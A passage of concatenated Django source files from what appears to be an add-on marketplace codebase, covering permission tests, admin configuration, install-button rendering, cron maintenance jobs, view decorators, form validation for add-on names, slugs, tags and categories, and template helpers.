assert not check_addon_ownership(self.request, self.addon, dev=True)
def test_viewer(self):
assert check_addon_ownership(self.request, self.addon, viewer=True)
self.au.role = amo.AUTHOR_ROLE_DEV
self.au.save()
assert check_addon_ownership(self.request, self.addon, viewer=True)
self.au.role = amo.AUTHOR_ROLE_VIEWER
self.au.save()
assert check_addon_ownership(self.request, self.addon, viewer=True)
self.au.role = amo.AUTHOR_ROLE_SUPPORT
self.au.save()
assert check_addon_ownership(self.request, self.addon, viewer=True)
def test_support(self):
assert check_addon_ownership(self.request, self.addon, viewer=True)
self.au.role = amo.AUTHOR_ROLE_DEV
self.au.save()
assert not check_addon_ownership(self.request, self.addon,
support=True)
self.au.role = amo.AUTHOR_ROLE_VIEWER
self.au.save()
assert not check_addon_ownership(self.request, self.addon,
support=True)
self.au.role = amo.AUTHOR_ROLE_SUPPORT
self.au.save()
assert check_addon_ownership(self.request, self.addon, support=True)
class TestCheckReviewer(TestCase):
fixtures = ['base/user_2519']
def setUp(self):
self.user = UserProfile.objects.get()
def test_no_perm(self):
req = req_factory_factory('noop', user=self.user)
assert not check_reviewer(req)
assert not check_reviewer(req, only='app')
assert not check_reviewer(req, only='addon')
def test_perm_apps(self):
self.grant_permission(self.user, 'Apps:Review')
req = req_factory_factory('noop', user=self.user)
assert check_reviewer(req)
assert check_reviewer(req, only='app')
assert not check_reviewer(req, only='addon')
def test_perm_addons(self):
self.grant_permission(self.user, 'Addons:Review')
req = req_factory_factory('noop', user=self.user)
assert check_reviewer(req)
assert not check_reviewer(req, only='app')
assert check_reviewer(req, only='addon')
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
import amo
from . import models
class AddonAdmin(admin.ModelAdmin):
exclude = ('authors',)
list_display = ('__unicode__', 'type', 'status', 'average_rating',
'premium_type', 'premium')
list_filter = ('type', 'status')
fieldsets = (
(None, {
'fields': ('name', 'guid', 'default_locale', 'type', 'status',
'highest_status', 'outstanding'),
}),
('Details', {
'fields': ('summary', 'description', 'homepage', 'eula',
'privacy_policy', 'developer_comments', 'icon_type',
'the_reason', 'the_future'),
}),
('Support', {
'fields': ('support_url', 'support_email'),
}),
('Stats', {
'fields': ('average_rating', 'bayesian_rating', 'total_reviews',
'weekly_downloads', 'total_downloads',
'average_daily_downloads', 'average_daily_users',
'share_count'),
}),
('Truthiness', {
'fields': ('disabled_by_user', 'trusted', 'view_source',
'public_stats', 'prerelease', 'admin_review',
'site_specific', 'external_software', 'dev_agreement'),
}),
('Money', {
'fields': ('wants_contributions', 'paypal_id', 'suggested_amount',
'annoying'),
}),
('Dictionaries', {
'fields': ('target_locale', 'locale_disambiguation'),
}))
def queryset(self, request):
return models.Addon.objects.filter(type__in=amo.MARKETPLACE_TYPES)
class FeatureAdmin(admin.ModelAdmin):
raw_id_fields = ('addon',)
list_filter = ('application', 'locale')
list_display = ('addon', 'application', 'locale')
class CategoryAdmin(admin.ModelAdmin):
raw_id_fields = ('addons',)
list_display = ('name', 'application', 'type', 'count')
list_filter = ('application', 'type')
exclude = ('count',)
admin.site.register(models.Feature, FeatureAdmin)
admin.site.register(models.Addon, AddonAdmin)
admin.site.register(models.Category, CategoryAdmin)
########NEW FILE########
__FILENAME__ = buttons
from django.db.models import Q
from django.shortcuts import render
from django.utils.safestring import mark_safe
from django.views.decorators.cache import cache_page
import jingo
import jinja2
from tower import ugettext_lazy as _lazy
import amo
from amo.helpers import urlparams
from addons.models import Addon
from translations.models import Translation
def _install_button(context, addon, version=None, show_contrib=True,
show_warning=True, src='', collection=None, size='',
detailed=False, mobile=False, impala=False):
"""If version isn't given, we use the latest version."""
request = context['request']
app, lang = context['APP'], context['LANG']
src = src or context.get('src') or request.GET.get('src', '')
collection = ((collection.uuid if hasattr(collection, 'uuid') else None)
or collection
or context.get('collection')
or request.GET.get('collection')
or request.GET.get('collection_id')
or request.GET.get('collection_uuid'))
button = install_button_factory(addon, app, lang, version, show_contrib,
show_warning, src, collection, size,
detailed, impala)
installed = (request.user.is_authenticated() and
addon.id in request.amo_user.mobile_addons)
c = {'button': button, 'addon': addon, 'version': button.version,
'installed': installed}
if impala:
template = 'addons/impala/button.html'
elif mobile:
template = 'addons/mobile/button.html'
else:
template = 'addons/button.html'
t = jingo.render_to_string(request, template, c)
return jinja2.Markup(t)
@jinja2.contextfunction
def install_button(context, addon, **kwargs):
backup = kwargs.pop('show_backup', True)
base = _install_button(context, addon, **kwargs)
if backup and addon.backup_version:
kwargs['version'] = addon.backup_version
backup = _install_button(context, addon, **kwargs)
return mark_safe('%s\n<div class="backup-button hidden '
'install-wrapper">%s</div>' % (base, backup))
return base
@jinja2.contextfunction
def big_install_button(context, addon, **kwargs):
from addons.helpers import statusflags
backup = kwargs.pop('show_backup', True)
flags = jinja2.escape(statusflags(context, addon))
base = _install_button(context, addon, detailed=True, size='prominent',
**kwargs)
params = [flags, base]
wrap = u'<div class="install-wrapper %s">%s</div>'
if backup and addon.backup_version:
params.append(flags)
params.append(_install_button(context, addon,
version=addon.backup_version,
detailed=True, size='prominent',
**kwargs))
wrap += '<div class="backup-button hidden install-wrapper %s">%s</div>'
return jinja2.Markup(wrap % (tuple(params)))
@jinja2.contextfunction
def mobile_install_button(context, addon, **kwargs):
from addons.helpers import statusflags
b = _install_button(context, addon, detailed=True, size='prominent',
mobile=True, **kwargs)
flags = jinja2.escape(statusflags(context, addon))
s = u'<div class="install-wrapper %s">%s</div>'
return jinja2.Markup(s % (flags, b))
def install_button_factory(*args, **kwargs):
button = InstallButton(*args, **kwargs)
# Order matters. We want to highlight unreviewed before featured. They
# should be mutually exclusive, but you never know.
classes = (('lite', LiteInstallButton),
('unreviewed', UnreviewedInstallButton),
('featured', FeaturedInstallButton))
for pred, cls in classes:
if getattr(button, pred, False):
button.__class__ = cls
break
button.prepare()
return button
class InstallButton(object):
button_class = ['download']
install_class = []
install_text = ''
def __init__(self, addon, app, lang, version=None, show_contrib=True,
show_warning=True, src='', collection=None, size='',
detailed=False, impala=False):
self.addon, self.app, self.lang = addon, app, lang
self.latest = version is None
self.version = version or addon.current_version
self.src = src
self.collection = collection
self.size = size
self.detailed = detailed
self.impala = impala
self.unreviewed = addon.is_unreviewed()
self.featured = (not self.unreviewed
and addon.is_featured(app, lang))
self.is_premium = addon.is_premium()
self.is_webapp = addon.is_webapp()
self._show_contrib = show_contrib
self.show_contrib = (show_contrib and addon.takes_contributions
and addon.annoying == amo.CONTRIB_ROADBLOCK)
self.show_warning = show_warning and self.unreviewed
def prepare(self):
"""Called after the class is set to manage contributions."""
# Get a copy for this instance.
self.button_class = list(self.__class__.button_class)
self.install_class = list(self.__class__.install_class)
if self.show_contrib:
try:
self.button_class.remove('download')
except ValueError:
pass
self.button_class += ['contrib', 'go']
self.install_class.append('contrib')
if self.size:
self.button_class.append(self.size)
if self.is_webapp:
self.install_class.append('webapp')
def attrs(self):
rv = {}
addon = self.addon
if (self._show_contrib and addon.takes_contributions
and addon.annoying == amo.CONTRIB_AFTER):
rv['data-after'] = 'contrib'
if addon.type == amo.ADDON_SEARCH:
rv['data-search'] = 'true'
return rv
def links(self):
return []
def fix_link(self, url):
if self.src:
url = urlparams(url, src=self.src)
if self.collection:
url = urlparams(url, collection_id=self.collection)
return url
class FeaturedInstallButton(InstallButton):
install_class = ['featuredaddon']
install_text = _lazy(u'Featured', 'install_button')
class UnreviewedInstallButton(InstallButton):
install_class = ['unreviewed']
install_text = _lazy(u'Not Reviewed', 'install_button')
button_class = 'download caution'.split()
class LiteInstallButton(InstallButton):
install_class = ['lite']
button_class = ['caution']
install_text = _lazy(u'Experimental', 'install_button')
class Link(object):
def __init__(self, text, url, os=None, file=None):
self.text, self.url, self.os, self.file = text, url, os, file
# Cache it for a year.
@cache_page(60 * 60 * 24 * 365)
def js(request):
return render(request, 'addons/popups.html',
content_type='text/javascript')
def smorgasbord(request):
"""
Gather many different kinds of tasty add-ons together.
Great for testing install buttons.
"""
def _compat(min, max):
# Helper for faking compatible_apps.
return {'min': {'version': min}, 'max': {'version': max}}
addons = []
normal_version = _compat('1.0', '10.0')
older_version = _compat('1.0', '2.0')
newer_version = _compat('9.0', '10.0')
def all_versions(addon, base_tag):
x = (('', normal_version),
(' + older version', older_version),
(' + newer version', newer_version))
for extra, version in x:
a = addon()
a.tag = base_tag + extra
a.compatible_apps[request.APP] = version
addons.append(a)
# Featured.
featured = Addon.objects.featured(request.APP)
addons.append(featured[0])
addons[-1].tag = 'featured'
normal = Addon.objects.listed(request.APP).exclude(id__in=featured)
# Normal, Older Version, Newer Version.
all_versions(lambda: normal[0], 'normal')
# Unreviewed.
exp = Addon.objects.unreviewed()
all_versions(lambda: exp[0], 'unreviewed')
# Multiple Platforms.
addons.append(Addon.objects.get(id=2313))
addons[-1].tag = 'platformer'
# Multiple Platforms + EULA.
addons.append(Addon.objects.get(id=2313))
addons[-1].eula = Translation(localized_string='xxx')
addons[-1].tag = 'platformer + eula'
# Incompatible Platform + EULa.
addons.append(Addon.objects.get(id=5308))
addons[-1].eula = Translation(localized_string='xxx')
addons[-1].tag = 'windows/linux-only + eula'
# Incompatible Platform.
all_versions(lambda: Addon.objects.get(id=5308), 'windows/linux-only')
# EULA.
eula = (Q(eula__isnull=False, eula__localized_string__isnull=False)
& ~Q(eula__localized_string=''))
addons.append(normal.filter(eula)[0])
addons[-1].tag = 'eula'
addons.append(exp.filter(eula)[0])
addons[-1].tag = 'eula + unreviewed'
# Contributions.
addons.append(normal.filter(annoying=1)[0])
addons[-1].tag = 'contrib: passive'
addons.append(normal.filter(annoying=2)[0])
addons[-1].tag = 'contrib: after'
addons.append(normal.filter(annoying=3)[0])
addons[-1].tag = 'contrib: roadblock'
addons.append(Addon.objects.get(id=2608))
addons[-1].tag = 'after + eula'
addons.append(Addon.objects.get(id=8442))
addons[-1].tag = 'roadblock + eula'
# Other App.
addons.append(Addon.objects.get(id=5326))
addons[-1].tag = 'tbird'
# Mobile.
addons.append(Addon.objects.get(id=53476))
addons[-1].tag = 'mobile'
# Search Engine.
addons.append(Addon.objects.filter(type=amo.ADDON_SEARCH)[0])
addons[-1].tag = 'search engine'
# Beta Version
beta = normal.filter(versions__files__status=amo.STATUS_BETA)[0]
beta.tag = 'beta version'
# Future Version.
# No versions.
return render(request, 'addons/smorgasbord.html',
{'addons': addons, 'beta': beta})
########NEW FILE########
__FILENAME__ = cron
import logging
from datetime import datetime, timedelta
from django.conf import settings
from django.db import transaction
from django.db.models import F, Q
import cronjobs
import path
import waffle
from celery.task.sets import TaskSet
from celeryutils import task
import amo
from addons.models import Addon, AppSupport
from amo.decorators import write
from amo.utils import chunked
from files.models import File
log = logging.getLogger('z.cron')
task_log = logging.getLogger('z.task')
recs_log = logging.getLogger('z.recs')
# TODO(jbalogh): removed from cron on 6/27/11. If the site doesn't break,
# delete it.
@cronjobs.register
def fast_current_version():
# Candidate for deletion - Bug 750510
if not waffle.switch_is_active('current_version_crons'):
return
# Only find the really recent versions; this is called a lot.
t = datetime.now() - timedelta(minutes=5)
qs = Addon.objects.values_list('id')
q1 = qs.filter(status=amo.STATUS_PUBLIC,
versions__files__datestatuschanged__gte=t)
q2 = qs.filter(status__in=amo.UNREVIEWED_STATUSES,
versions__files__created__gte=t)
addons = set(q1) | set(q2)
if addons:
_update_addons_current_version(addons)
# TODO(jbalogh): removed from cron on 6/27/11. If the site doesn't break,
# delete it.
@cronjobs.register
def update_addons_current_version():
"""Update the current_version field of the addons."""
# Candidate for deletion - Bug 750510
if not waffle.switch_is_active('current_version_crons'):
return
d = (Addon.objects.filter(disabled_by_user=False,
status__in=amo.VALID_STATUSES)
.exclude(type=amo.ADDON_PERSONA).values_list('id'))
ts = [_update_addons_current_version.subtask(args=[chunk])
for chunk in chunked(d, 100)]
TaskSet(ts).apply_async()
# TODO(jbalogh): removed from cron on 6/27/11. If the site doesn't break,
# delete it.
@task(rate_limit='20/m')
def _update_addons_current_version(data, **kw):
# Candidate for deletion - Bug 750510
if not waffle.switch_is_active('current_version_crons'):
return
task_log.info("[%s@%s] Updating addons current_versions." %
(len(data), _update_addons_current_version.rate_limit))
for pk in data:
try:
addon = Addon.objects.get(pk=pk[0])
addon.update_version()
except Addon.DoesNotExist:
m = "Failed to update current_version. Missing add-on: %d" % (pk)
task_log.debug(m)
transaction.commit_unless_managed()
def _change_last_updated(next):
# We jump through some hoops here to make sure we only change the add-ons
# that really need it, and to invalidate properly.
current = dict(Addon.objects.values_list('id', 'last_updated'))
changes = {}
for addon, last_updated in next.items():
try:
if current[addon] != last_updated:
changes[addon] = last_updated
except KeyError:
pass
if not changes:
return
log.debug('Updating %s add-ons' % len(changes))
# Update + invalidate.
qs = Addon.objects.no_cache().filter(id__in=changes).no_transforms()
for addon in qs:
addon.last_updated = changes[addon.id]
addon.save()
@cronjobs.register
@write
def addon_last_updated():
next = {}
for q in Addon._last_updated_queries().values():
for addon, last_updated in q.values_list('id', 'last_updated'):
next[addon] = last_updated
_change_last_updated(next)
# Get anything that didn't match above.
other = (Addon.objects.no_cache().filter(last_updated__isnull=True)
.values_list('id', 'created'))
_change_last_updated(dict(other))
@cronjobs.register
def update_addon_appsupport():
# Find all the add-ons that need their app support details updated.
newish = (Q(last_updated__gte=F('appsupport__created')) |
Q(appsupport__created__isnull=True))
# Search providers don't list supported apps.
has_app = Q(versions__apps__isnull=False) | Q(type=amo.ADDON_SEARCH)
has_file = Q(versions__files__status__in=amo.VALID_STATUSES)
good = Q(has_app, has_file) | Q(type=amo.ADDON_PERSONA)
ids = (Addon.objects.valid().distinct()
.filter(newish, good).values_list('id', flat=True))
ts = [_update_appsupport.subtask(args=[chunk])
for chunk in chunked(ids, 20)]
TaskSet(ts).apply_async()
@cronjobs.register
def update_all_appsupport():
from .tasks import update_appsupport
ids = sorted(set(AppSupport.objects.values_list('addon', flat=True)))
task_log.info('Updating appsupport for %s addons.' % len(ids))
for idx, chunk in enumerate(chunked(ids, 100)):
if idx % 10 == 0:
task_log.info('[%s/%s] Updating appsupport.'
% (idx * 100, len(ids)))
update_appsupport(chunk)
@task
@transaction.commit_manually
def _update_appsupport(ids, **kw):
from .tasks import update_appsupport
update_appsupport(ids)
@cronjobs.register
def addons_add_slugs():
"""Give slugs to any slugless addons."""
Addon._meta.get_field('modified').auto_now = False
q = Addon.objects.filter(slug=None).order_by('id')
# Chunk it so we don't do huge queries.
for chunk in chunked(q, 300):
task_log.info('Giving slugs to %s slugless addons' % len(chunk))
for addon in chunk:
addon.save()
@cronjobs.register
def hide_disabled_files():
# If an add-on or a file is disabled, it should be moved to
# GUARDED_ADDONS_PATH so it's not publicly visible.
#
# We ignore deleted versions since we hide those files when deleted and
# also due to bug 980916.
ids = (File.objects
.filter(version__deleted=False)
.filter(Q(status=amo.STATUS_DISABLED) |
Q(version__addon__status=amo.STATUS_DISABLED) |
Q(version__addon__disabled_by_user=True))
.values_list('id', flat=True))
for chunk in chunked(ids, 300):
qs = File.objects.no_cache().filter(id__in=chunk)
qs = qs.select_related('version')
for f in qs:
f.hide_disabled_file()
@cronjobs.register
def unhide_disabled_files():
# Files are getting stuck in /guarded-addons for some reason. This job
# makes sure guarded add-ons are supposed to be disabled.
log = logging.getLogger('z.files.disabled')
q = (Q(version__addon__status=amo.STATUS_DISABLED)
| Q(version__addon__disabled_by_user=True))
files = set(File.objects.filter(q | Q(status=amo.STATUS_DISABLED))
.values_list('version__addon', 'filename'))
for filepath in path.path(settings.GUARDED_ADDONS_PATH).walkfiles():
addon, filename = filepath.split('/')[-2:]
if tuple([int(addon), filename]) not in files:
log.warning('File that should not be guarded: %s.' % filepath)
try:
file_ = (File.objects.select_related('version__addon')
.get(version__addon=addon, filename=filename))
file_.unhide_disabled_file()
except File.DoesNotExist:
log.warning('File object does not exist for: %s.' % filepath)
except Exception:
log.error('Could not unhide file: %s.' % filepath,
exc_info=True)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django import http
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
import commonware.log
from addons.models import Addon
log = commonware.log.getLogger('mkt.purchase')
def addon_view(f, qs=Addon.objects.all):
@functools.wraps(f)
def wrapper(request, addon_id=None, app_slug=None, *args, **kw):
"""Provides an addon given either an addon_id or app_slug."""
assert addon_id or app_slug, 'Must provide addon_id or app_slug'
get = lambda **kw: get_object_or_404(qs(), **kw)
if addon_id and addon_id.isdigit():
addon = get(id=addon_id)
# Don't get in an infinite loop if addon.slug.isdigit().
if addon.slug != addon_id:
url = request.path.replace(addon_id, addon.slug, 1)
if request.GET:
url += '?' + request.GET.urlencode()
return http.HttpResponsePermanentRedirect(url)
elif addon_id:
addon = get(slug=addon_id)
elif app_slug:
addon = get(app_slug=app_slug)
return f(request, addon, *args, **kw)
return wrapper
def addon_view_factory(qs):
# Don't evaluate qs or the locale will get stuck on whatever the server
# starts with. The addon_view() decorator will call qs with no arguments
# before doing anything, so lambdas are ok.
# GOOD: Addon.objects.valid
# GOOD: lambda: Addon.objects.valid().filter(type=1)
# BAD: Addon.objects.valid()
return functools.partial(addon_view, qs=qs)
def has_purchased(f):
"""
If the addon is premium, require a purchase.
Must be called after addon_view decorator.
"""
@functools.wraps(f)
def wrapper(request, addon, *args, **kw):
if addon.is_premium() and not addon.has_purchased(request.amo_user):
log.info('Not purchased: %d' % addon.pk)
raise PermissionDenied
return f(request, addon, *args, **kw)
return wrapper
def can_become_premium(f):
"""Check that the addon can become premium."""
@functools.wraps(f)
def wrapper(request, addon_id, addon, *args, **kw):
if not addon.can_become_premium():
log.info('Cannot become premium: %d' % addon.pk)
raise PermissionDenied
return f(request, addon_id, addon, *args, **kw)
return wrapper
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.forms.formsets import formset_factory
import captcha.fields
import commonware.log
import happyforms
from quieter_formset.formset import BaseFormSet
from tower import ugettext as _, ungettext as ngettext
import amo
from access import acl
from addons.models import Addon, AddonCategory, BlacklistedSlug, Category
from addons.utils import reverse_name_lookup
from addons.widgets import CategoriesSelectMultiple
from amo.utils import slug_validator, slugify, sorted_groupby
from applications.models import Application
from tags.models import Tag
from translations.fields import TransField, TransTextarea
from translations.forms import TranslationFormMixin
from translations.models import Translation
from translations.widgets import TranslationTextInput
log = commonware.log.getLogger('z.addons')
def clean_name(name, instance=None):
if not instance:
log.debug('clean_name called without an instance: %s' % name)
if instance:
id = reverse_name_lookup(name, instance.is_webapp())
else:
id = reverse_name_lookup(name)
# If we get an id and either there's no instance or the instance.id != id.
if id and (not instance or id != instance.id):
raise forms.ValidationError(_('This name is already in use. Please '
'choose another.'))
return name
def clean_slug(slug, instance):
slug_validator(slug, lower=False)
slug_field = 'app_slug' if instance.is_webapp() else 'slug'
if slug != getattr(instance, slug_field):
if Addon.objects.filter(**{slug_field: slug}).exists():
raise forms.ValidationError(
_('This slug is already in use. Please choose another.'))
if BlacklistedSlug.blocked(slug):
raise forms.ValidationError(
_('The slug cannot be "%s". Please choose another.' % slug))
return slug
def clean_tags(request, tags):
target = [slugify(t, spaces=True, lower=True) for t in tags.split(',')]
target = set(filter(None, target))
min_len = amo.MIN_TAG_LENGTH
max_len = Tag._meta.get_field('tag_text').max_length
max_tags = amo.MAX_TAGS
total = len(target)
blacklisted = (Tag.objects.values_list('tag_text', flat=True)
.filter(tag_text__in=target, blacklisted=True))
if blacklisted:
# L10n: {0} is a single tag or a comma-separated list of tags.
msg = ngettext('Invalid tag: {0}', 'Invalid tags: {0}',
len(blacklisted)).format(', '.join(blacklisted))
raise forms.ValidationError(msg)
restricted = (Tag.objects.values_list('tag_text', flat=True)
.filter(tag_text__in=target, restricted=True))
if not acl.action_allowed(request, 'Addons', 'Edit'):
if restricted:
# L10n: {0} is a single tag or a comma-separated list of tags.
msg = ngettext('"{0}" is a reserved tag and cannot be used.',
'"{0}" are reserved tags and cannot be used.',
len(restricted)).format('", "'.join(restricted))
raise forms.ValidationError(msg)
else:
# Admin's restricted tags don't count towards the limit.
total = len(target - set(restricted))
if total > max_tags:
num = total - max_tags
msg = ngettext('You have {0} too many tags.',
'You have {0} too many tags.', num).format(num)
raise forms.ValidationError(msg)
if any(t for t in target if len(t) > max_len):
raise forms.ValidationError(_('All tags must be %s characters '
'or less after invalid characters are removed.' % max_len))
if any(t for t in target if len(t) < min_len):
msg = ngettext("All tags must be at least {0} character.",
"All tags must be at least {0} characters.",
min_len).format(min_len)
raise forms.ValidationError(msg)
return target
class AddonFormBase(TranslationFormMixin, happyforms.ModelForm):
def __init__(self, *args, **kw):
self.request = kw.pop('request')
super(AddonFormBase, self).__init__(*args, **kw)
class Meta:
models = Addon
fields = ('name', 'slug', 'summary', 'tags')
def clean_slug(self):
return clean_slug(self.cleaned_data['slug'], self.instance)
def clean_tags(self):
return clean_tags(self.request, self.cleaned_data['tags'])
def get_tags(self, addon):
if acl.action_allowed(self.request, 'Addons', 'Edit'):
return list(addon.tags.values_list('tag_text', flat=True))
else:
return list(addon.tags.filter(restricted=False)
.values_list('tag_text', flat=True))
class AddonFormBasic(AddonFormBase):
name = TransField(max_length=50)
slug = forms.CharField(max_length=30)
summary = TransField(widget=TransTextarea(attrs={'rows': 4}),
max_length=250)
tags = forms.CharField(required=False)
class Meta:
model = Addon
fields = ('name', 'slug', 'summary', 'tags')
def __init__(self, *args, **kw):
# Force the form to use app_slug if this is a webapp. We want to keep
# this under "slug" so all the js continues to work.
if kw['instance'].is_webapp():
kw.setdefault('initial', {})['slug'] = kw['instance'].app_slug
super(AddonFormBasic, self).__init__(*args, **kw)
self.fields['tags'].initial = ', '.join(self.get_tags(self.instance))
# Do not simply append validators, as validators will persist between
# instances.
validate_name = lambda x: clean_name(x, self.instance)
name_validators = list(self.fields['name'].validators)
name_validators.append(validate_name)
self.fields['name'].validators = name_validators
def save(self, addon, commit=False):
tags_new = self.cleaned_data['tags']
tags_old = [slugify(t, spaces=True) for t in self.get_tags(addon)]
# Add new tags.
for t in set(tags_new) - set(tags_old):
Tag(tag_text=t).save_tag(addon)
# Remove old tags.
for t in set(tags_old) - set(tags_new):
Tag(tag_text=t).remove_tag(addon)
# We ignore `commit`, since we need it to be `False` so we can save
# the ManyToMany fields on our own.
addonform = super(AddonFormBasic, self).save(commit=False)
addonform.save()
return addonform
def _post_clean(self):
if self.instance.is_webapp():
# Switch slug to app_slug in cleaned_data and self._meta.fields so
# we can update the app_slug field for webapps.
try:
self._meta.fields = list(self._meta.fields)
slug_idx = self._meta.fields.index('slug')
data = self.cleaned_data
if 'slug' in data:
data['app_slug'] = data.pop('slug')
self._meta.fields[slug_idx] = 'app_slug'
super(AddonFormBasic, self)._post_clean()
finally:
self._meta.fields[slug_idx] = 'slug'
else:
super(AddonFormBasic, self)._post_clean()
class AppFormBasic(AddonFormBasic):
"""Form to override name length for apps."""
name = TransField(max_length=128)
class ApplicationChoiceField(forms.ModelChoiceField):
def label_from_instance(self, obj):
return obj.id
class CategoryForm(forms.Form):
application = ApplicationChoiceField(Application.objects.all(),
widget=forms.HiddenInput,
required=False)
categories = forms.ModelMultipleChoiceField(
queryset=Category.objects.all(), widget=CategoriesSelectMultiple)
def save(self, addon):
application = self.cleaned_data['application']
categories_new = self.cleaned_data['categories']
categories_old = [cats for app, cats in addon.app_categories if
(app and application and app.id == application.id) or
(not app and not application)]
if categories_old:
categories_old = categories_old[0]
# Add new categories.
for c in set(categories_new) - set(categories_old):
AddonCategory(addon=addon, category=c).save()
# Remove old categories.
for c in set(categories_old) - set(categories_new):
AddonCategory.objects.filter(addon=addon, category=c).delete()
def clean_categories(self):
categories = self.cleaned_data['categories']
total = categories.count()
max_cat = amo.MAX_CATEGORIES
if getattr(self, 'disabled', False) and total:
if categories[0].type == amo.ADDON_WEBAPP:
raise forms.ValidationError(_('Categories cannot be changed '
'while your app is featured for this application.'))
else:
raise forms.ValidationError(_('Categories cannot be changed '
'while your add-on is featured for this application.'))
if total > max_cat:
# L10n: {0} is the number of categories.
raise forms.ValidationError(ngettext(
'You can have only {0} category.',
'You can have only {0} categories.',
max_cat).format(max_cat))
has_misc = filter(lambda x: x.misc, categories)
if has_misc and total > 1:
raise forms.ValidationError(
_('The miscellaneous category cannot be combined with '
'additional categories.'))
return categories
class BaseCategoryFormSet(BaseFormSet):
def __init__(self, *args, **kw):
self.addon = kw.pop('addon')
self.request = kw.pop('request', None)
super(BaseCategoryFormSet, self).__init__(*args, **kw)
self.initial = []
if self.addon.type == amo.ADDON_WEBAPP:
apps = [None]
else:
apps = sorted(self.addon.compatible_apps.keys(),
key=lambda x: x.id)
# Drop any apps that don't have appropriate categories.
qs = Category.objects.filter(type=self.addon.type)
if self.addon.type != amo.ADDON_WEBAPP:
qs = qs.filter(application__in=[a.id for a in apps])
app_cats = dict((k, list(v)) for k, v in
sorted_groupby(qs, 'application_id'))
for app in list(apps):
if app and not app_cats.get(app.id):
apps.remove(app)
if not app_cats:
apps = []
for app in apps:
cats = dict(self.addon.app_categories).get(app, [])
self.initial.append({'categories': [c.id for c in cats]})
for app, form in zip(apps, self.forms):
key = app.id if app else None
form.request = self.request
form.initial['application'] = key
form.app = app
cats = sorted(app_cats[key], key=lambda x: x.name)
form.fields['categories'].choices = [(c.id, c.name) for c in cats]
# If this add-on is featured for this application, category
# changes are forbidden.
if not acl.action_allowed(self.request, 'Addons', 'Edit'):
form.disabled = (app and self.addon.is_featured(app))
def save(self):
for f in self.forms:
f.save(self.addon)
CategoryFormSet = formset_factory(form=CategoryForm,
formset=BaseCategoryFormSet, extra=0)
def icons():
"""
Generates a list of tuples for the default icons for add-ons,
in the format (psuedo-mime-type, description).
"""
icons = [('image/jpeg', 'jpeg'), ('image/png', 'png'), ('', 'default')]
dirs, files = storage.listdir(settings.ADDON_ICONS_DEFAULT_PATH)
for fname in files:
if '32' in fname and not 'default' in fname:
icon_name = fname.split('-')[0]
icons.append(('icon/%s' % icon_name, icon_name))
return icons
class AddonFormDetails(AddonFormBase):
default_locale = forms.TypedChoiceField(choices=Addon.LOCALES)
class Meta:
model = Addon
fields = ('description', 'default_locale', 'homepage')
def clean(self):
# Make sure we have the required translations in the new locale.
required = 'name', 'summary', 'description'
data = self.cleaned_data
if not self.errors and 'default_locale' in self.changed_data:
fields = dict((k, getattr(self.instance, k + '_id'))
for k in required)
locale = self.cleaned_data['default_locale']
ids = filter(None, fields.values())
qs = (Translation.objects.filter(locale=locale, id__in=ids,
localized_string__isnull=False)
.values_list('id', flat=True))
missing = [k for k, v in fields.items() if v not in qs]
# They might be setting description right now.
if 'description' in missing and locale in data['description']:
missing.remove('description')
if missing:
raise forms.ValidationError(
_('Before changing your default locale you must have a '
'name, summary, and description in that locale. '
'You are missing %s.') % ', '.join(map(repr, missing)))
return data
class AddonFormSupport(AddonFormBase):
support_url = TransField.adapt(forms.URLField)(required=False)
support_email = TransField.adapt(forms.EmailField)(required=False)
class Meta:
model = Addon
fields = ('support_email', 'support_url')
def __init__(self, *args, **kw):
super(AddonFormSupport, self).__init__(*args, **kw)
if self.instance.is_premium():
self.fields['support_email'].required = True
def save(self, addon, commit=True):
instance = self.instance
url = instance.support_url.localized_string
return super(AddonFormSupport, self).save(commit)
class AddonFormTechnical(AddonFormBase):
developer_comments = TransField(widget=TransTextarea, required=False)
class Meta:
model = Addon
fields = ('developer_comments', 'view_source', 'site_specific',
'external_software', 'auto_repackage', 'public_stats')
class AddonForm(happyforms.ModelForm):
name = forms.CharField(widget=TranslationTextInput,)
homepage = forms.CharField(widget=TranslationTextInput, required=False)
eula = forms.CharField(widget=TranslationTextInput,)
description = forms.CharField(widget=TranslationTextInput,)
developer_comments = forms.CharField(widget=TranslationTextInput,)
privacy_policy = forms.CharField(widget=TranslationTextInput,)
the_future = forms.CharField(widget=TranslationTextInput,)
the_reason = forms.CharField(widget=TranslationTextInput,)
support_email = forms.CharField(widget=TranslationTextInput,)
class Meta:
model = Addon
fields = ('name', 'homepage', 'default_locale', 'support_email',
'support_url', 'description', 'summary',
'developer_comments', 'eula', 'privacy_policy', 'the_reason',
'the_future', 'view_source', 'prerelease', 'site_specific',)
exclude = ('status', )
def clean_name(self):
return clean_name(self.cleaned_data['name'])
def save(self):
desc = self.data.get('description')
if desc and desc != unicode(self.instance.description):
amo.log(amo.LOG.EDIT_DESCRIPTIONS, self.instance)
if self.changed_data:
amo.log(amo.LOG.EDIT_PROPERTIES, self.instance)
super(AddonForm, self).save()
class AbuseForm(happyforms.Form):
recaptcha = captcha.fields.ReCaptchaField(label='')
text = forms.CharField(required=True,
label='',
widget=forms.Textarea())
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(AbuseForm, self).__init__(*args, **kwargs)
if (not self.request.user.is_anonymous() or
not settings.RECAPTCHA_PRIVATE_KEY):
del self.fields['recaptcha']
########NEW FILE########
__FILENAME__ = helpers
import jinja2
from jingo import register
from tower import ugettext as _
from . import buttons
from amo.utils import chunked
register.function(buttons.install_button)
register.function(buttons.big_install_button)
register.function(buttons.mobile_install_button)
@register.filter
@jinja2.contextfilter
def statusflags(context, addon):
"""unreviewed/recommended status flags for use as CSS classes"""
app = context['APP']
lang = context['LANG']
if addon.is_unreviewed():
return 'unreviewed'
elif addon.is_featured(app, lang):
return 'featuredaddon'
else:
return ''
@register.filter
@jinja2.contextfilter
def flag(context, addon):
"""unreviewed/recommended flag heading."""
status = statusflags(context, addon)
msg = {'unreviewed': _('Not Reviewed'), 'featuredaddon': _('Featured')}
if status:
return jinja2.Markup(u'<h5 class="flag">%s</h5>' % msg[status])
else:
return ''
@register.inclusion_tag('addons/impala/upsell_note.html')
@jinja2.contextfunction
def upsell_note(context, addon, module_context='impala'):
return new_context(**locals())
@register.inclusion_tag('addons/impala/dependencies_note.html')
@jinja2.contextfunction
